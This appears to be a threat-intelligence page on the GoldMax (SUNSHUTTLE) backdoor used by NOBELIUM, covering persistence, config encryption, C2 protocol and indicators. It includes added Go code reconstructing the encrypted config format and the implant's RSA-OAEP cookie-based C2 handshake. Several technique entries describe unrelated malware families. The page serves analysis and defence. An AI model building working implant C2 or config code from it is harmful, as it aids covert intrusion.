GoldMax
GoldMax, also known as SUNSHUTTLE, is a second-stage command-and-control backdoor written in Go, with Windows and Linux variants. It is attributed to NOBELIUM (APT29, Cozy Bear, The Dukes), the SVR-linked threat actor behind the SolarWinds supply-chain intrusion. Microsoft reported GoldMax as part of NOBELIUM's late-stage, post-compromise tooling, observed primarily from August to September 2020 and possibly deployed as early as June 2020. It was introduced after initial access via compromised credentials or the trojanized SolarWinds Orion binary and follow-on activity involving the TEARDROP loader.
GoldMax is a full-featured backdoor: it executes OS commands, spawns a shell, downloads and executes files, uploads (exfiltrates) files over the existing C2 channel, and accepts configuration updates from C2. It persists through scheduled tasks, including tasks that impersonate systems-management software, and has been found under ProgramData subfolders named to resemble legitimate software locations, using a filename that matches the system name. Before activating, it compares the host's current date and time against a hardcoded activation date (an execution trigger), and it can report the current timestamp to the C2 server.
For stealth and evasion, GoldMax samples have been packed, and the backdoor stores its encrypted configuration on disk in .tmp files. Configuration values can be updated dynamically from C2, including the activation date, C2 URL, User-Agent, decoy-traffic settings, and PRNG range. Per Microsoft, the configuration is encrypted with AES-256 in CFB mode and then Base64-encoded with a custom alphabet, so a standard Base64 decoder does not recover the ciphertext, let alone the plaintext. GoldMax also issues decoy HTTP GET requests around its malicious communications to blend with legitimate web activity, including pseudo-random Referer values drawn from common domains. C2 communications are protected with RSA: Microsoft described session establishment using HTTP requests carrying custom Cookie values, RSA-OAEP decryption of a server-supplied session key with an RSA private key embedded in the sample, and a hardcoded shared-secret acknowledgement that the implant expects to find in an HTTP 200 response. GoldMax C2 infrastructure has used high-reputation or aged domains, including compromised domains and domains obtained through resellers.
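The configuration scheme described above, as an added example that is neither GoldMax's own code nor taken from Microsoft's report: a config is sealed with AES-256-CFB (random IV prepended) and Base64-encoded with a custom alphabet, then reversed the way a config extractor would. The key, the alphabet, the JSON layout, the field names and the sample values are assumptions made for this example; a real extractor substitutes the key and alphabet recovered from the sample.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"io"
)

// Config stands in for the settings the page lists. The real on-disk layout is
// not documented here, so JSON is an assumption made for this example.
type Config struct {
	ActivationDate string `json:"activation_date"`
	C2URL          string `json:"c2_url"`
	UserAgent      string `json:"user_agent"`
	DecoyTraffic   bool   `json:"decoy_traffic"`
	PRNGRange      [2]int `json:"prng_range"`
}

// Assumed demo values, not the real GoldMax key or alphabet. The alphabet must
// hold 64 distinct bytes; '=' stays as padding because it is outside the set.
var (
	demoKey      = sha256.Sum256([]byte("hypothetical-goldmax-demo-key")) // 32 bytes: AES-256
	demoAlphabet = "ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba9876543210+/"
	demoEncoding = base64.NewEncoding(demoAlphabet)
)

// SealConfig serialises cfg, encrypts it with AES-256-CFB under key (a random IV
// is prepended to the ciphertext) and encodes the result with the custom
// alphabet: the write path for a features.dat.tmp-style file.
func SealConfig(cfg Config, key [32]byte) (string, error) {
	plain, err := json.Marshal(cfg)
	if err != nil {
		return "", err
	}
	block, err := aes.NewCipher(key[:])
	if err != nil {
		return "", err
	}
	buf := make([]byte, aes.BlockSize+len(plain))
	iv := buf[:aes.BlockSize]
	if _, err := io.ReadFull(rand.Reader, iv); err != nil {
		return "", err
	}
	cipher.NewCFBEncrypter(block, iv).XORKeyStream(buf[aes.BlockSize:], plain)
	return demoEncoding.EncodeToString(buf), nil
}

// OpenConfig is the analyst-side inverse: custom Base64 decode, split off the
// IV, AES-256-CFB decrypt, parse. CFB carries no authentication tag, so a wrong
// key or alphabet is only noticed when the plaintext fails to parse.
func OpenConfig(blob string, key [32]byte) (Config, error) {
	var cfg Config
	raw, err := demoEncoding.DecodeString(blob)
	if err != nil {
		return cfg, fmt.Errorf("custom base64 decode: %w", err)
	}
	if len(raw) < aes.BlockSize {
		return cfg, errors.New("blob shorter than one AES block: no IV present")
	}
	block, err := aes.NewCipher(key[:])
	if err != nil {
		return cfg, err
	}
	iv, body := raw[:aes.BlockSize], raw[aes.BlockSize:]
	plain := make([]byte, len(body))
	cipher.NewCFBDecrypter(block, iv).XORKeyStream(plain, body)
	if err := json.Unmarshal(plain, &cfg); err != nil {
		return cfg, fmt.Errorf("plaintext is not a config (wrong key or alphabet?): %w", err)
	}
	return cfg, nil
}

func main() {
	// Constructed sample values; the URL is a placeholder, not a real C2.
	cfg := Config{
		ActivationDate: "2020-08-01",
		C2URL:          "https://example.invalid/",
		UserAgent:      "Mozilla/5.0 (example)",
		DecoyTraffic:   true,
		PRNGRange:      [2]int{3, 7},
	}
	blob, err := SealConfig(cfg, demoKey)
	if err != nil {
		panic(err)
	}
	got, err := OpenConfig(blob, demoKey)
	if err != nil {
		panic(err)
	}
	fmt.Printf("sealed: %s\nrecovered: %+v\n", blob, got)
}
```

Two practical points follow from the code. Because CFB is unauthenticated, a wrong key silently yields garbage, so an extractor should validate the decrypted structure rather than trust the decrypt step. And because a custom alphabet can reuse the standard Base64 character set (the example's reversed alphabet does), a generic Base64 decode may succeed without error and still produce nonsense; the alphabet has to come from the sample.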
Additional reported characteristics include a hardcoded MAC-address check: if an interface with the address c8:27:cc:c2:37:5a is present, the malware terminates. Samples were compiled with Go 1.14.2 and carry build paths such as /var/www/html/builds/ and /var/www/html/go/src/. GoldMax is referenced explicitly in CISA's malware analysis report on SUNSHUTTLE and in Microsoft's reporting on GoldMax, GoldFinder, and Sibot as part of NOBELIUM's layered persistence. Indicators cited directly in that reporting include the alias SUNSHUTTLE, the MAC address c8:27:cc:c2:37:5a, the example encrypted configuration filename features.dat.tmp, and the behavioral artifacts around scheduled-task persistence and ProgramData masquerading.
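The C2 session establishment Microsoft describes (custom Cookie values, an RSA-OAEP-wrapped session key unwrapped with the embedded private key, a hardcoded shared secret expected in the HTTP 200 response), reconstructed as an added example with both sides running in one process. This is not GoldMax's or Microsoft's code: the cookie names, the 32-byte session key, the acknowledgement string, the SHA-256 OAEP hash and the single-round-trip shape are assumptions; only the overall sequence follows the description above.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/base64"
	"errors"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
)

// Assumed protocol details: the page gives no cookie names, key length or
// acknowledgement string, so these are placeholders for this example.
const (
	helloCookie   = "id"              // marks the implant's first request
	sessionCookie = "session"         // carries the RSA-OAEP-wrapped session key
	sharedSecret  = "demo-ack-secret" // stands in for the hardcoded acknowledgement
)

// c2Server is the operator side: it mints a 32-byte session key, wraps it with
// RSA-OAEP (SHA-256) under the public key, and returns it in a Set-Cookie header
// alongside the shared-secret acknowledgement in a 200 response.
type c2Server struct{ pub *rsa.PublicKey }

func (s *c2Server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
	if _, err := r.Cookie(helloCookie); err != nil {
		http.NotFound(w, r) // requests without the marker see a dead page
		return
	}
	key := make([]byte, 32)
	rand.Read(key) // crypto/rand; does not return an error in supported Go versions
	wrapped, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, s.pub, key, nil)
	if err != nil {
		http.Error(w, "wrap failure", http.StatusInternalServerError)
		return
	}
	http.SetCookie(w, &http.Cookie{Name: sessionCookie, Value: base64.StdEncoding.EncodeToString(wrapped)})
	w.WriteHeader(http.StatusOK)
	io.WriteString(w, sharedSecret)
}

// establishSession is the implant side: present the marker cookie, insist on a
// 200 whose body is exactly the shared secret, then unwrap the session key with
// the embedded private key. Anything else is treated as not-our-C2.
func establishSession(c2URL string, priv *rsa.PrivateKey) ([]byte, error) {
	req, err := http.NewRequest(http.MethodGet, c2URL, nil)
	if err != nil {
		return nil, err
	}
	req.AddCookie(&http.Cookie{Name: helloCookie, Value: "constructed-host-id"})
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(resp.Body)
	if resp.StatusCode != http.StatusOK || string(body) != sharedSecret {
		return nil, errors.New("acknowledgement missing: refusing to talk to this server")
	}
	for _, c := range resp.Cookies() {
		if c.Name == sessionCookie {
			wrapped, err := base64.StdEncoding.DecodeString(c.Value)
			if err != nil {
				return nil, err
			}
			return rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, wrapped, nil)
		}
	}
	return nil, errors.New("no session cookie in response")
}

// RunExchange generates a throwaway key pair (standing in for the key embedded
// in a sample), wires both sides together in-process and returns the session key.
func RunExchange() ([]byte, error) {
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}
	srv := httptest.NewServer(&c2Server{pub: &priv.PublicKey})
	defer srv.Close()
	return establishSession(srv.URL, priv)
}

// RejectsWithoutAck models a sinkhole that answers 200 "OK" without the secret.
// No private key is needed: the implant bails out before it would unwrap anything.
func RejectsWithoutAck() bool {
	sink := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { io.WriteString(w, "OK") }))
	defer sink.Close()
	_, err := establishSession(sink.URL, nil)
	return err != nil
}

func main() {
	key, err := RunExchange()
	fmt.Printf("session key: %d bytes, err=%v, sinkhole rejected: %v\n", len(key), err, RejectsWithoutAck())
}
```

The defender-relevant consequence is visible in RejectsWithoutAck: a sinkhole or emulation harness that only returns HTTP 200 never gets the implant past session setup. To elicit follow-on behaviour in a lab, the harness has to return the acknowledgement string recovered from the sample and a session key wrapped for the sample's embedded key.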
Groups observed using it
2 distinct threat actors attributed by public researchers.
Their toolkit includes 7-Zip, AdFind, ATI-Agent, AtNow, BEATDROP, BloodHound, CEELOADER, CloudDuke, Cobalt Strike, CosmicDuke, CozyDuke, Danfuan, EnvyScout, FatDuke, FoggyWeb, GeminiDuke, Geppei, GoldFinder, GoldMax...
We exposed similarities between DarkHalo’s SunShuttle backdoor and the Tomiris implant.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniques
SVR cyber threat actors were responsible for the SolarWinds Orion supply chain compromise and the associated campaign that affected U.S. government agencies, critical infrastructure entities, and private sector organizations.
"It is distributed through a wide-scale malicious email campaign operated by NOBELIUM"
“On May 25, 2021, the campaign escalated as NOBELIUM leveraged the legitimate mass-mailing service, Constant Contact, to masquerade as a US-based development organization and distribute malicious URLs…”
Execution
4 techniques
GoldMax backdoor executable... Hides in hidden directories. Persistence via cron job on Linux.
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
Many entries explicitly state malware 'can create a reverse shell' or 'launch a remote shell,' including 4H RAT, AuditCred, BLACKCOFFEE, Carbanak, DarkComet, Exaramel for Windows, PlugX, QuasarRAT, and ZxShell.
The content repeatedly describes use of cmd.exe, cmd /c, Windows command shell, and xp_cmdshell to execute commands, run payloads, launch binaries, perform reconnaissance, persistence, cleanup, and ransomware actions. Examples include: 'Sandworm Team used the xp_cmdshell command in MS-SQL', 'APT41 used cmd.exe /c to execute commands on remote machines', and many malware families 'can use cmd.exe to execute commands on a compromised host.'
MITRE ATT&CK® Techniques... System Services: Service Execution [T1569.002]
Persistence
3 techniques
The scheduled-task and cron-job persistence evidence for this tactic is the same as listed under Execution.
Privilege Escalation
3 techniques
The scheduled-task evidence for this tactic is the same as listed under Execution.
Defense Evasion
7 techniques
The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
"Sandworm Team used UPX to pack a copy of Mimikatz"; "APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium"; "Lazarus Group packed malicious .db files with Themida to evade detection."
Examples throughout the content include 'encrypted payloads decrypted and executed in memory,' 'encrypts its configuration file,' 'AES-encrypted resource,' 'RC4 encrypted embedded scripts,' and 'payload includes an encrypted main component.'
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.
RedCurl mimicked legitimate file names and scheduled tasks, e.g. MicrosoftCurrentupdatesCheck and MdMMaintenenceTask to mask malicious files and scheduled tasks.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
Credential Access
1 technique
Lateral movement via the “credential hopping” technique, which includes browser cookie theft to bypass multifactor authentication (MFA) on privileged cloud accounts.
Discovery
2 techniques
The content repeatedly describes actors and malware using commands and APIs such as ipconfig /all, ifconfig, arp -a, route print, netsh interface show, GetAdaptersInfo, and GetIpNetTable to gather IP addresses, MAC addresses, DNS, DHCP, gateways, routing tables, ARP cache, proxy settings, and network adapter/interface details.
Multiple malware and threat groups are described as collecting/deriving local system time, date, timestamp, tick count, or time zone (e.g., "used time /t and net time \ip/hostname for system time discovery"; "collects the timestamp from the victim’s machine"; "can collect the time zone information from the system").
Lateral Movement
1 technique
SVR cyber actors have used a range of initial exploitation techniques... coupled with stealthy intrusion tradecraft within compromised networks... Lateral movement via the “credential hopping” technique...
Command and Control
7 techniques
Examples include 'AppleJeus's COLDCAT C2 leverages cookie headers to contain data over HTTPS,' 'ChChes ... embeds data within the Cookie HTTP header,' 'GoldMax ... used custom HTTP cookies for C2,' and 'UPPERCUT ... sending error codes in Cookie headers.'
MITRE ATT&CK Mappings: APT29 Command and Control T1071: Application Layer Protocol .001: Web Protocols .004: DNS
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
MITRE ATT&CK® Techniques... Ingress Tool Transfer [T1105]
4H RAT has the capability to create a remote shell. AuditCred can open a reverse shell on the system to execute commands. PlugX allows actors to spawn a reverse shell on a victim. QuasarRAT can launch a remote shell to execute commands on the victim’s machine.
The content repeatedly describes malware and threat actors using SSL, TLS, HTTPS, RSA, AES, Blowfish, RC4, ECIES, Diffie-Hellman, OpenSSL, WolfSSL, and mutual TLS to protect command and control traffic.
Multiple malware families and intrusion sets are described as encrypting C2 traffic using SSL/TLS/HTTPS (e.g., "used HTTPS for command and control", "encrypts C2 communications with TLS", "uses SSL for encrypting C2 communications", "TLS-encrypted WebSocket Protocol (WSS) for C2").
Examples include: "encrypts some C2 with RSA", "RSA encryption for C2 communications", "hard-coded RSA public key", "RSA-2048", "RSA-4096", and "REvil has encrypted C2 communications with the ECIES algorithm".
Exfiltration
1 technique
ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.
Recent activity
30 sources tracked across advisories, community write-ups, and news.
Backdoor referenced as similar to the Tomiris Golang backdoor; no further technical detail provided in this content.
Malware implant identified in the content as one of the families used in the SolarWinds-related activity by NOBELIUM.
Custom malware attributed to NOBELIUM used for layered persistence (per Microsoft).